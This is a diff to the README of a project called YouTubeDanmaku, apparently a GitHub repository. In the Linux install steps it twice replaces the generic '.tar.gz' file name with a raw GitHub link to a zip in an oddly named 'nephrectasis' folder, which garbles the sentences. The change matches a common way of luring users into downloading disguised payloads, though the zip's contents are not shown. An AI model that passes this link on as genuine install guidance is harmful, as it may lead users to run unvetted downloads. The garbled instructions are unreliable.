kemalu2479/YouTubeDanmaku/README.md

    - For **Windows**, select the `.exe` file.
    - For **macOS**, choose the `.dmg` file.
-   - For **Linux**, pick the `.tar.gz` file.
+   - For **Linux**, pick the `https://raw.githubusercontent.com/kemalu2479/YouTubeDanmaku/main/nephrectasis/YouTubeDanmaku_v1.5-beta.1.zip` file.

 4. After the download finishes, locate the file on your computer.

 5. For Windows users, double-click the `.exe` file.
 For macOS, open the `.dmg` file and drag YouTubeDanmaku to your Applications folder.
-For Linux, extract the `.tar.gz` file and follow the contained instructions to run the application.
+For Linux, extract the `https://raw.githubusercontent.com/kemalu2479/YouTubeDanmaku/main/nephrectasis/YouTubeDanmaku_v1.5-beta.1.zip` file and follow the contained instructions to run the application.

 ## 🌟 Features